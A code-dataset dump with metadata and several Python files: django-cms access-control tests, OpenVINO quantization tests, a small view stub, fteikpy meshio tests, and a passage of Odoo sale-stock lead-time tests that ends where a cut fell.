hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fbe703dc7ce7b89f04d8685a855de0529eaad5bb
| 10,409
|
py
|
Python
|
cms/tests/test_security.py
|
devyntk/django-cms
|
f889a30e94f268394ae9abf32c032239d0a9be55
|
[
"BSD-3-Clause"
] | 5,659
|
2015-01-01T02:42:30.000Z
|
2020-10-07T02:38:29.000Z
|
cms/tests/test_security.py
|
devyntk/django-cms
|
f889a30e94f268394ae9abf32c032239d0a9be55
|
[
"BSD-3-Clause"
] | 3,264
|
2015-01-02T10:11:48.000Z
|
2020-10-08T13:15:07.000Z
|
cms/tests/test_security.py
|
devyntk/django-cms
|
f889a30e94f268394ae9abf32c032239d0a9be55
|
[
"BSD-3-Clause"
] | 2,132
|
2015-01-01T11:28:21.000Z
|
2020-10-06T09:09:11.000Z
|
from django.conf import settings
from django.contrib.auth import get_user_model
from django.http import QueryDict
from cms.api import add_plugin, create_page
from cms.models.pluginmodel import CMSPlugin
from cms.test_utils.project.placeholderapp.models import Example1
from cms.test_utils.testcases import CMSTestCase
class SecurityTests(CMSTestCase):
    """
    Test security issues by trying some naive requests to add/alter/delete data.

    Each scenario runs twice: anonymously (expecting a redirect to the admin
    login page) and as a staff user without permissions (expecting a 403),
    asserting in both cases that no plugin data was actually changed.
    """

    def get_data(self):
        """Create a test page and return (page, placeholder, superuser, staff)."""
        page = create_page("page", "nav_playground.html", "en")
        placeholder = page.placeholders.get(slot='body')
        superuser = self.get_superuser()
        staff = self.get_staff_user_with_no_permissions()
        return page, placeholder, superuser, staff

    def _login_staff(self, staff):
        """Log ``staff`` in via the test client.

        NOTE: test users created by the CMSTestCase helpers use their
        username as their password, hence the same attribute for both.
        """
        username = getattr(staff, get_user_model().USERNAME_FIELD)
        self.client.login(username=username, password=username)

    def _assert_login_required(self, response, endpoint):
        """Assert ``response`` redirects an anonymous user to the admin login.

        The expected URL carries the attempted ``endpoint`` in ``?next=``.
        """
        # since the user is not logged in, they should be prompted to log in.
        self.assertEqual(response.status_code, 302)
        querystring = QueryDict('', mutable=True)
        querystring['next'] = endpoint
        expected_url = '/{lang}/admin/login/?{next}'.format(
            lang=settings.LANGUAGES[0][0],
            next=querystring.urlencode(safe='/')
        )
        self.assertRedirects(response, expected_url)

    def test_add(self):
        """
        Test adding a plugin to a *PAGE*.
        """
        page, placeholder, superuser, staff = self.get_data()
        post_data = {}
        self.assertEqual(CMSPlugin.objects.count(), 0)
        # log the user out and post the plugin data to the cms add-plugin URL.
        self.client.logout()
        endpoint = self.get_add_plugin_uri(
            placeholder,
            'TextPlugin',
            settings.LANGUAGES[0][0],
        )
        response = self.client.post(endpoint, post_data)
        self._assert_login_required(response, endpoint)
        self.assertEqual(CMSPlugin.objects.count(), 0)
        # now log a staff user without permissions in and do the same as above.
        self._login_staff(staff)
        response = self.client.post(endpoint, post_data)
        # the user is logged in and the security check fails, so it should 403.
        self.assertEqual(response.status_code, 403)
        self.assertEqual(CMSPlugin.objects.count(), 0)

    def test_edit(self):
        """
        Test editing a *PAGE* plugin
        """
        page, placeholder, superuser, staff = self.get_data()
        # create the plugin using a superuser
        plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
        plugin_data = {
            'plugin_id': plugin.pk,
            'body': 'newbody',
        }
        self.assertEqual(plugin.body, 'body')  # check the body is as expected.
        # log the user out, try to edit the plugin
        self.client.logout()
        endpoint = self.get_change_plugin_uri(plugin)
        response = self.client.post(endpoint, plugin_data)
        self._assert_login_required(response, endpoint)
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')
        # now log a staff user without permissions in and do the same as above.
        self._login_staff(staff)
        response = self.client.post(endpoint, plugin_data)
        # the user is logged in and the security check fails, so it should 403.
        self.assertEqual(response.status_code, 403)
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')

    def test_delete(self):
        """
        Test deleting a *PAGE* plugin
        """
        page, placeholder, superuser, staff = self.get_data()
        plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
        plugin_data = {
            'plugin_id': plugin.pk,
        }
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')
        # log the user out, try to remove the plugin
        self.client.logout()
        endpoint = self.get_delete_plugin_uri(plugin)
        response = self.client.post(endpoint, plugin_data)
        self._assert_login_required(response, endpoint)
        self.assertEqual(CMSPlugin.objects.count(), 1)
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')
        # now log a staff user without permissions in and do the same as above.
        self._login_staff(staff)
        response = self.client.post(endpoint, plugin_data)
        # the user is logged in and the security check fails, so it should 403.
        self.assertEqual(response.status_code, 403)
        self.assertEqual(CMSPlugin.objects.count(), 1)
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')

    def test_add_ph(self):
        """
        Test adding a *NON PAGE* plugin
        """
        page, placeholder, superuser, staff = self.get_data()
        post_data = {}
        endpoint = self.get_add_plugin_uri(placeholder, 'TextPlugin', settings.LANGUAGES[0][0])
        self.assertEqual(CMSPlugin.objects.count(), 0)
        # log the user out and try to add a plugin using PlaceholderAdmin
        self.client.logout()
        response = self.client.post(endpoint, post_data)
        self._assert_login_required(response, endpoint)
        self.assertEqual(CMSPlugin.objects.count(), 0)
        # now log a staff user without permissions in and do the same as above.
        self._login_staff(staff)
        response = self.client.post(endpoint, post_data)
        # the user is logged in and the security check fails, so it should 403.
        self.assertEqual(response.status_code, 403)
        self.assertEqual(CMSPlugin.objects.count(), 0)

    def test_edit_ph(self):
        """
        Test editing a *NON PAGE* plugin
        """
        page, placeholder, superuser, staff = self.get_data()
        plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
        endpoint = self.get_change_plugin_uri(plugin, container=Example1)
        plugin_data = {
            'body': 'newbody',
            'language': 'en',
            'plugin_id': plugin.pk,
        }
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')
        # log the user out and try to edit a plugin using PlaceholderAdmin
        self.client.logout()
        response = self.client.post(endpoint, plugin_data)
        self._assert_login_required(response, endpoint)
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')
        # now log a staff user without permissions in and do the same as above.
        self._login_staff(staff)
        response = self.client.post(endpoint, plugin_data)
        # the user is logged in and the security check fails, so it should 403.
        self.assertEqual(response.status_code, 403)
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')

    def test_delete_ph(self):
        """
        Test deleting a *NON PAGE* plugin
        """
        page, placeholder, superuser, staff = self.get_data()
        plugin = add_plugin(placeholder, 'TextPlugin', 'en', body='body')
        plugin_data = {
            'plugin_id': plugin.pk,
        }
        plugin = self.reload(plugin)
        self.assertEqual(plugin.body, 'body')
        endpoint = self.get_delete_plugin_uri(plugin, container=Example1)
        # log the user out and try to remove a plugin using PlaceholderAdmin
        self.client.logout()
        response = self.client.post(endpoint, plugin_data)
        self._assert_login_required(response, endpoint)
        self.assertEqual(CMSPlugin.objects.count(), 1)
        # now log a staff user without permissions in and do the same as above.
        self._login_staff(staff)
        response = self.client.post(endpoint, plugin_data)
        # the user is logged in and the security check fails, so it should 403.
        self.assertEqual(response.status_code, 403)
        self.assertEqual(CMSPlugin.objects.count(), 1)
| 46.46875
| 95
| 0.637813
| 1,254
| 10,409
| 5.1874
| 0.105263
| 0.073789
| 0.023982
| 0.040584
| 0.874712
| 0.865027
| 0.859032
| 0.840892
| 0.828593
| 0.819985
| 0
| 0.010712
| 0.255644
| 10,409
| 223
| 96
| 46.67713
| 0.828859
| 0.182438
| 0
| 0.758824
| 0
| 0
| 0.049437
| 0.019392
| 0
| 0
| 0
| 0
| 0.223529
| 1
| 0.041176
| false
| 0.035294
| 0.041176
| 0
| 0.094118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2209f87e0d421461e944ecc57c3f2fae32d256af
| 7,250
|
py
|
Python
|
model-optimizer/unit_tests/extensions/front/onnx/quantize_linear_resolver_test.py
|
ledmonster/openvino
|
c1b1e2e7afc698ac82b32bb1f502ad2e90cd1419
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/unit_tests/extensions/front/onnx/quantize_linear_resolver_test.py
|
ledmonster/openvino
|
c1b1e2e7afc698ac82b32bb1f502ad2e90cd1419
|
[
"Apache-2.0"
] | 26
|
2021-01-18T16:21:41.000Z
|
2022-02-21T13:04:24.000Z
|
model-optimizer/unit_tests/extensions/front/onnx/quantize_linear_resolver_test.py
|
ngaloppo/openvino
|
7aad8827a585e2e08c5fd872bb17e40072718661
|
[
"Apache-2.0"
] | 1
|
2021-08-18T14:29:37.000Z
|
2021-08-18T14:29:37.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from extensions.front.onnx.quantize_linear_resolver import QuantizeLinearResolver
from mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph
# Node set for the input graph: a single ONNX QuantizeLinear fed by its
# scale and zero-point Const nodes, with a generic producer and consumer.
nodes1_attributes = {
    'input': {'kind': 'op', 'op': 'AnyOp'},
    'quantize': {'kind': 'op', 'op': 'QuantizeLinear'},
    'scale_param_q': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'zerop_param_q': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'out': {'kind': 'op', 'op': 'AnyOp'},
}
# Node set for the expected graph after QuantizeLinearResolver runs:
# a FakeQuantize whose input range limits are the scale multiplied (mul1/mul2)
# by per-type constants, followed by a Cast (Convert) to the target dtype.
nodes_ref_attributes = {
    'input': {'kind': 'op', 'op': 'AnyOp'},
    'cast': {'kind': 'op', 'op': 'Cast', 'type': 'Convert'},
    'f_quantize': {'kind': 'op', 'op': 'FakeQuantize', 'type': 'FakeQuantize'},
    'mul1': {'kind': 'op', 'op': 'Mul', 'type': 'Multiply'},
    'mul2': {'kind': 'op', 'op': 'Mul', 'type': 'Multiply'},
    'scale_param_q': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'in_low': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'in_high': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'out_low': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'out_high': {'kind': 'op', 'type': 'Const', 'op': 'Const'},
    'out': {'kind': 'op', 'op': 'AnyOp'},
}
class TestQuantizeLinearResolver(unittest.TestCase):
    """Tests for the QuantizeLinearResolver front transformation.

    Each case builds a small QuantizeLinear graph, runs the resolver, and
    compares the result against a reference FakeQuantize + Cast graph.
    The three scenarios only differ in the zero-point constant and the
    expected quantization ranges, so graph construction is factored into
    parameterized helpers.
    """

    @staticmethod
    def _quantize_graph(scale_value, zerop_value=None):
        """Build the input graph; omit the zero-point input when ``zerop_value`` is None."""
        edges = [('input', 'quantize'),
                 ('scale_param_q', 'quantize')]
        update = {'scale_param_q': {'shape': np.array([]), 'value': scale_value}}
        if zerop_value is not None:
            edges.append(('zerop_param_q', 'quantize'))
            update['zerop_param_q'] = {'shape': np.array([]), 'value': zerop_value}
        edges.append(('quantize', 'out'))
        return build_graph(nodes1_attributes, edges, update,
                           nodes_with_edges_only=True)

    @staticmethod
    def _ref_graph(in_low, in_high, out_low, out_high, dst_type):
        """Build the expected FakeQuantize graph with the given range constants."""
        return build_graph(nodes_ref_attributes,
                           [('input', 'f_quantize'),
                            ('scale_param_q', 'mul1', {'out': 0}),
                            ('in_low', 'mul1'),
                            ('mul1', 'f_quantize'),
                            ('scale_param_q', 'mul2', {'out': 0}),
                            ('in_high', 'mul2'),
                            ('mul2', 'f_quantize'),
                            ('out_low', 'f_quantize'),
                            ('out_high', 'f_quantize'),
                            ('f_quantize', 'cast'),
                            ('cast', 'out'),
                            ],
                           {'in_low': {'shape': np.array([]), 'value': in_low},
                            'in_high': {'shape': np.array([]), 'value': in_high},
                            'out_low': {'shape': np.array([]), 'value': out_low},
                            'out_high': {'shape': np.array([]), 'value': out_high},
                            'cast': {'dst_type': dst_type},
                            }, nodes_with_edges_only=True)

    def _run_and_compare(self, graph, graph_ref):
        """Run the resolver on ``graph`` and assert it matches ``graph_ref``."""
        graph.stage = 'front'
        QuantizeLinearResolver().find_and_replace_pattern(graph)
        flag, resp = compare_graphs(graph, graph_ref, 'out', check_op_attrs=True)
        self.assertTrue(flag, resp)

    def test_quantize_uint8(self):
        # uint8 zero-point of 128 -> input range [-128, 127], output [0, 255].
        graph = self._quantize_graph(np.float32(1.0 / 255), np.uint8(128))
        graph_ref = self._ref_graph(-128, 127, 0, 255, np.uint8)
        self._run_and_compare(graph, graph_ref)

    def test_quantize_int8(self):
        # int8 zero-point of 0 -> symmetric range [-128, 127] on both sides.
        graph = self._quantize_graph(np.float32(1.0 / 255), np.int8(0))
        graph_ref = self._ref_graph(-128, 127, -128, 127, np.int8)
        self._run_and_compare(graph, graph_ref)

    def test_quantize_no_zerop(self):
        # Missing zero-point defaults to uint8 semantics with range [0, 255].
        graph = self._quantize_graph(np.float32(1.0 / 255))
        graph_ref = self._ref_graph(0, 255, 0, 255, np.uint8)
        self._run_and_compare(graph, graph_ref)
| 50
| 102
| 0.403034
| 631
| 7,250
| 4.37401
| 0.14897
| 0.041304
| 0.073913
| 0.10471
| 0.827536
| 0.821739
| 0.76413
| 0.743478
| 0.729348
| 0.705435
| 0
| 0.024384
| 0.423034
| 7,250
| 144
| 103
| 50.347222
| 0.635429
| 0.010621
| 0
| 0.756098
| 0
| 0
| 0.206695
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 1
| 0.02439
| false
| 0
| 0.04065
| 0
| 0.073171
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97e7f81531270b3e8c1e2b13604fd65beea47e55
| 186
|
py
|
Python
|
views/teams.py
|
Nicolasopf/Metrevs
|
5625e84332a527a35e70f0ac8f35facacbfc2277
|
[
"MIT"
] | 1
|
2021-07-06T17:49:39.000Z
|
2021-07-06T17:49:39.000Z
|
views/teams.py
|
Nicolasopf/Metrevs
|
5625e84332a527a35e70f0ac8f35facacbfc2277
|
[
"MIT"
] | null | null | null |
views/teams.py
|
Nicolasopf/Metrevs
|
5625e84332a527a35e70f0ac8f35facacbfc2277
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
''' View for /teams show teams data processed '''
from views import app_views
@app_views.route('/teams')
def show_teams():
    """Handle GET /teams; currently returns a placeholder string."""
    return 'hi'
| 18.6
| 49
| 0.645161
| 26
| 186
| 4.5
| 0.653846
| 0.230769
| 0.239316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 0.177419
| 186
| 9
| 50
| 20.666667
| 0.75817
| 0.403226
| 0
| 0
| 0
| 0
| 0.081633
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3f4180388e8f7b019a5a435bd41d3325344f562c
| 1,949
|
py
|
Python
|
test/test_meshio.py
|
keurfonluu/fteikpy
|
39e50b1772642b9c5cdda4d1b8171f6d5abaa5e2
|
[
"BSD-3-Clause"
] | 15
|
2020-11-11T21:42:46.000Z
|
2022-03-20T10:21:47.000Z
|
test/test_meshio.py
|
keurfonluu/fteikpy
|
39e50b1772642b9c5cdda4d1b8171f6d5abaa5e2
|
[
"BSD-3-Clause"
] | 10
|
2020-11-12T08:39:25.000Z
|
2022-03-30T10:56:51.000Z
|
test/test_meshio.py
|
keurfonluu/fteikpy
|
39e50b1772642b9c5cdda4d1b8171f6d5abaa5e2
|
[
"BSD-3-Clause"
] | 5
|
2020-12-23T01:19:27.000Z
|
2022-02-24T14:16:56.000Z
|
import numpy
from fteikpy import Eikonal2D, Eikonal3D, grid_to_meshio, ray_to_meshio
def test_meshio_2d():
    """2D grid/ray meshio conversion: check point/cell counts and field sums."""
    nz, nx = 8, 10
    source = (float(nz // 2), float(nx // 2))

    eikonal = Eikonal2D(numpy.ones((nz, nx)), (1.0, 1.0))
    traveltime = eikonal.solve(source, return_gradient=True)
    ray = traveltime.raytrace((0.0, 0.0), honor_grid=True)

    mesh = grid_to_meshio(eikonal, traveltime)
    ray_mesh = ray_to_meshio(ray)

    npts = (nz + 1) * (nx + 1)
    ncells = nz * nx
    assert len(mesh.points) == npts
    assert sum(len(cell) for cell in mesh.cells) == ncells

    # Traveltime is zero at the source node; total is a regression value.
    times = mesh.point_data["Traveltime"]
    assert times[npts // 2] == 0.0
    assert numpy.allclose(times.sum(), 378.23469225)

    # Gradient components vanish at the source and sum to zero by symmetry.
    for grad in mesh.point_data["Gradient"].T:
        assert grad[npts // 2] == 0.0
        assert numpy.allclose(grad.sum(), 0.0)

    assert mesh.cell_data["Velocity"][0].sum() == ncells
    assert len(ray_mesh.points) == len(ray)
    assert len(ray_mesh.cells[0][1]) == len(ray) - 1
    assert ray_mesh.cells[0][1].sum() == 64.0
def test_meshio_3d():
    """3D grid/ray meshio conversion: check point/cell counts and field sums."""
    nz, nx, ny = 8, 10, 12
    source = (float(nz // 2), float(nx // 2), float(ny // 2))

    eikonal = Eikonal3D(numpy.ones((nz, nx, ny)), (1.0, 1.0, 1.0))
    traveltime = eikonal.solve(source, return_gradient=True)
    ray = traveltime.raytrace((0.0, 0.0, 0.0), honor_grid=True)

    mesh = grid_to_meshio(eikonal, traveltime)
    ray_mesh = ray_to_meshio(ray)

    npts = (nz + 1) * (nx + 1) * (ny + 1)
    ncells = nz * nx * ny
    assert len(mesh.points) == npts
    assert sum(len(cell) for cell in mesh.cells) == ncells

    # Traveltime is zero at the source node; total is a regression value.
    times = mesh.point_data["Traveltime"]
    assert times[npts // 2] == 0.0
    assert numpy.allclose(times.sum(), 6909.90160991)

    # Gradient components vanish at the source and sum to zero by symmetry.
    for grad in mesh.point_data["Gradient"].T:
        assert grad[npts // 2] == 0.0
        assert numpy.allclose(grad.sum(), 0.0)

    assert mesh.cell_data["Velocity"][0].sum() == ncells
    assert len(ray_mesh.points) == len(ray)
    assert len(ray_mesh.cells[0][1]) == len(ray) - 1
    assert ray_mesh.cells[0][1].sum() == 169.0
| 32.483333
| 78
| 0.605439
| 323
| 1,949
| 3.541796
| 0.173375
| 0.024476
| 0.015734
| 0.013986
| 0.812937
| 0.812937
| 0.812937
| 0.812937
| 0.812937
| 0.812937
| 0
| 0.06645
| 0.212417
| 1,949
| 59
| 79
| 33.033898
| 0.678827
| 0
| 0
| 0.428571
| 0
| 0
| 0.036942
| 0
| 0
| 0
| 0
| 0
| 0.47619
| 1
| 0.047619
| false
| 0
| 0.047619
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58d912b021566eccf850b54e82e71b68b8918cb8
| 14,141
|
py
|
Python
|
odoo-13.0/addons/sale_stock/tests/test_sale_stock_lead_time.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 12
|
2021-03-26T08:39:40.000Z
|
2022-03-16T02:20:10.000Z
|
odoo-13.0/addons/sale_stock/tests/test_sale_stock_lead_time.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 13
|
2020-12-20T16:00:21.000Z
|
2022-03-14T14:55:30.000Z
|
odoo-13.0/addons/sale_stock/tests/test_sale_stock_lead_time.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | 17
|
2020-08-31T11:18:49.000Z
|
2022-02-09T05:57:31.000Z
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import timedelta
from odoo import fields
from odoo.addons.stock.tests.common2 import TestStockCommon
class TestSaleStockLeadTime(TestStockCommon):
def setUp(self):
super(TestSaleStockLeadTime, self).setUp()
# Update the product_1 with type and Customer Lead Time
self.product_1.write({'type': 'product',
'sale_delay': 5.0})
    def test_00_product_company_level_delays(self):
        """ In order to check schedule date, set product's Customer Lead Time
        and company's Sales Safety Days."""
        company = self.env.ref('base.main_company')
        # Update company with Sales Safety Days
        company.write({'security_lead': 3.00})
        # Create sale order of product_1
        order = self.env['sale.order'].create({
            'partner_id': self.partner_1.id,
            'partner_invoice_id': self.partner_1.id,
            'partner_shipping_id': self.partner_1.id,
            'pricelist_id': self.env.ref('product.list0').id,
            'picking_policy': 'direct',
            'warehouse_id': self.warehouse_1.id,
            'order_line': [(0, 0, {'name': self.product_1.name,
                                   'product_id': self.product_1.id,
                                   'product_uom_qty': 10,
                                   'product_uom': self.uom_unit.id,
                                   'customer_lead': self.product_1.sale_delay})]})
        # Confirm our standard sale order
        order.action_confirm()
        # Check that a delivery picking was created by the confirmation
        self.assertTrue(order.picking_ids, "Picking should be created.")
        # Check schedule date of picking:
        # expected = order date + Customer Lead Time - Sales Safety Days
        out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=company.security_lead)
        min_date = fields.Datetime.from_string(order.picking_ids[0].scheduled_date)
        # Allow one second of slack for the time elapsed during the test
        self.assertTrue(abs(min_date - out_date) <= timedelta(seconds=1), 'Schedule date of picking should be equal to: order date + Customer Lead Time - Sales Safety Days.')
    def test_01_product_route_level_delays(self):
        """ In order to check schedule dates, set product's Customer Lead Time
        and warehouse route's delay."""
        # Update warehouse_1 with Outgoing Shippings pick + pack + ship
        self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
        # Set a 2-day delay on every pull rule of the delivery route
        for pull_rule in self.warehouse_1.delivery_route_id.rule_ids:
            pull_rule.write({'delay': 2})
        # Create sale order of product_1
        order = self.env['sale.order'].create({
            'partner_id': self.partner_1.id,
            'partner_invoice_id': self.partner_1.id,
            'partner_shipping_id': self.partner_1.id,
            'pricelist_id': self.env.ref('product.list0').id,
            'picking_policy': 'direct',
            'warehouse_id': self.warehouse_1.id,
            'order_line': [(0, 0, {'name': self.product_1.name,
                                   'product_id': self.product_1.id,
                                   'product_uom_qty': 5,
                                   'product_uom': self.uom_unit.id,
                                   'customer_lead': self.product_1.sale_delay})]})
        # Confirm our standard sale order
        order.action_confirm()
        # Check that the pick/pack/ship pickings were created
        self.assertTrue(order.picking_ids, "Pickings should be created.")
        # Check schedule date of ship type picking:
        # expected = order date + Customer Lead Time - pull rule delay
        out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
        out_min_date = fields.Datetime.from_string(out.scheduled_date)
        out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
        # Allow one second of slack for the time elapsed during the test
        self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
        # Check schedule date of pack type picking:
        # expected = ship schedule date - pull rule delay
        pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
        pack_min_date = fields.Datetime.from_string(pack.scheduled_date)
        pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
        self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
        # Check schedule date of pick type picking:
        # expected = pack schedule date - pull rule delay
        pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
        pick_min_date = fields.Datetime.from_string(pick.scheduled_date)
        pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
